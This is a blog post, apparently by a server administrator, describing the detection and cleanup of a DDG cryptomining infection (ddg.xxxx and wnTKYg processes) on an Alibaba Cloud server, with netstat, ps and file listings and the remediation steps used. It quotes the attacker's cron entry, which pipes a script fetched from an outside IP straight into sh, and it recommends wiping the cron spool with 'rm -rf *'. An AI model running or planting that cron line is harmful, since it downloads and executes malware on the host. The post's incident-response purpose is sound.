起因,阿里云多次提醒我的一台服务器有恶意发包行为,且给出了一些解决办法。之前也没太在意,就按照解决办法处理了一下。然后过一段时间,还是提示有此行为。

猜肯定是中了木马了,开始以为是被肉鸡了拿来做DDoS攻击别人了。今天去服务器上仔细看了一下。然后发现了问题究竟(目前猜应该如此,还等待观察)。

现将过程记录如下:

1、先查看一下端口情况,发现有些名为ddg.xxxx的进程很可疑。然后看了下远程的链接IP,美国、法国等地方,很奇怪。网上搜了一下,没什么结果。

[root@zhangtianguo ~]# netstat -anp

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name

tcp        0      0 0.0.0.0:22111           0.0.0.0:*               LISTEN      840/sshd

tcp        0      0 127.0.0.1:32000         0.0.0.0:*               LISTEN      27121/java

tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      20918/memcached

tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      813/nginx: worker p

tcp        0      0 0.0.0.0:81              0.0.0.0:*               LISTEN      1497/httpd

tcp        0      0 0.0.0.0:82              0.0.0.0:*               LISTEN      1497/httpd

tcp        0      0 0.0.0.0:83              0.0.0.0:*               LISTEN      1497/httpd

tcp        0      0 0.0.0.0:85              0.0.0.0:*               LISTEN      1497/httpd

tcp      401      0 我的IP:42388    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp        0      1 我的IP:43968    52.2.199.2:8443         SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:38258    54.222.159.38:8443      SYN_SENT    1620/ddg.1010

tcp      401      0 我的IP:41811    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp      401      0 我的IP:53489    140.205.140.205:80      CLOSE_WAIT  11393/AliYunDunUpda

tcp        0      0 我的IP:59795    202.181.169.98:8443     ESTABLISHED 25125/ddg.2011

tcp        0      0 我的IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg

tcp        0      1 我的IP:47592    106.75.74.11:9443       SYN_SENT    12799/ddg.1009

tcp      371      0 10.174.208.36:51087     100.100.25.3:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp        0      0 我的IP:40019    106.11.68.13:80         ESTABLISHED 11448/AliYunDun

tcp        0      0 127.0.0.1:32000         127.0.0.1:31001         ESTABLISHED 27119/wrapper

tcp        0      1 我的IP:39511    39.108.56.56:8443       SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:50528    121.69.45.254:8443      SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:51132    106.75.71.242:8443      SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:60425    120.77.46.195:8443      SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:54458    116.39.7.114:8443       SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:57546    54.183.178.110:8443     SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:57686    106.75.134.239:8443     SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:56848    61.65.191.22:8443       SYN_SENT    1620/ddg.1010

tcp      401      0 我的IP:52910    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp        0    604 我的IP:22111    27.10.185.19:63158      ESTABLISHED 19368/sshd: root@pt

tcp        0      1 我的IP:56357    165.225.157.157:8443    SYN_SENT    1620/ddg.1010

2、然后,看了下这个进程的具体情况,居然是在/tmp/下的进程,心中更多抑或:

[root@zhangtianguo ~]# ps aux | grep ddg

root      1620  0.1  0.7 209684 13688 ?        Sl   Jul12  78:05 /tmp/ddg.1010

root     12799  0.0  0.2 262816  5460 ?        Sl   Jul01   9:32 /tmp/ddg.1009

root     19576  0.0  0.0 112644   960 pts/1    S+   10:01   0:00 grep --color=auto ddg

root     25125  0.0  0.2 207236  5172 ?        Sl   Aug27   2:13 /tmp/ddg.2011

root     28248  0.0  0.2 207192  4520 ?        Sl   Jul27  38:09 /tmp/ddg.1021

3、再去看看/tmp/下的文件,只有一个ddg.2011的文件,当时就心想,肯定是这些进程运行后,又自动删除了文件,看时间,8月创建的时间的文件,全部统统rm掉:

[root@zhangtianguo tmp]# ll -ah

total 9.6M

drwxrwxrwt.  9 root root 4.0K Aug 29 10:02 .

drwxr-xr-x. 20 root root 4.0K Jun 30 18:04 ..

srwxr-xr-x   1 root root    0 Aug 28 12:53 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>

-rwxr-xr-x   1 root root 9.5M Aug 11 10:13 ddg.2011

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .font-unix

drwxr-xr-x   2 root root 4.0K Aug 17 10:07 hsperfdata_root

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .ICE-unix

drwx------   3 root root 4.0K Nov 26  2015 systemd-private-nwO9vi

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .Test-unix

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .X11-unix

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .XIM-unix

4、再重复步骤1,查看端口情况,又发现了这个玩意儿,感觉不太正常(直觉):

tcp        0      0 我的IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg

5、一搜,原来居然是个挖矿的程序貌似。原来已经有不少人中招过了。解决办法也有很多人给出了,基本上就是:

先给redis的问题处理掉,改端口、加密码之类;

查看/root/.ssh/下的文件,是否有异常登陆信息,有的话删掉;

搜索wnTKYg的相关文件( find / -name *wnTKYg*),删掉;

删掉/tmp/下的异常文件(主要是ddg.xxxx之类的);

kill掉wnTKYg以及ddg.xxxx的进程;

还有个问题,这个程序有个自动任务,从木马服务器下载程序执行,也要删掉:

cd /var/spool/cron

ll -ah

rm -rf *

我查看这个目录时,发现里面的自动任务是这样的,好像是印度一个IP:

[root@zhangtianguo cron]# cat root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh

至此,完工。然后继续观察。

参考资料。感谢:

http://blog.csdn.net/u010789532/article/details/70528648

http://blog.csdn.net/zimou5581/article/details/73064878

最新文章

  1. 设置Textview最大长度,超出显示省略号
  2. 慕课网-Java入门第一季-7-3 Java 中无参带返回值方法的使用
  3. androud 自定义属性
  4. MarkdownPad Win10 无法预览
  5. 代码高亮插件SyntaxHighlighter
  6. MongoDB副本集学习(一):概述和环境搭建
  7. .Net知识点总结(一)
  8. 使用java8
  9. Android 多状态按钮 ToggleButton
  10. EFDB 基本规范&amp;知识
  11. XShell连接本地Ubuntu虚拟机
  12. jenkins~集群分发功能的具体实现
  13. Flex布局学习笔记
  14. beta冲刺用户测评-咸鱼
  15. JAVA之旅(十九)——ListIterator列表迭代器,List的三个子类对象,Vector的枚举,LinkedList,ArrayList和LinkedList的小练习
  16. Centos下安装Mysql异常
  17. nmap扫描测试
  18. 用js实现贪吃蛇
  19. python中自定义模块的引用
  20. css 文本超出范围显示省略号

热门文章

  1. [转]使用docker-compose 大杀器来部署服务 上
  2. 初识scss:配置与运行
  3. EditPlus配置
  4. csharp: DefaultValueAttribute Class
  5. &quot;美女相册&quot;的 js 实现代码
  6. 【代码笔记】Web-HTML-脚本
  7. Windows 10修复
  8. WebLogic 8的安装与配置详谈
  9. Linux原理总结 。。。更新中
  10. Jenkins报错&#39;Gradle build daemon disappeared unexpectedly&#39;的问题解决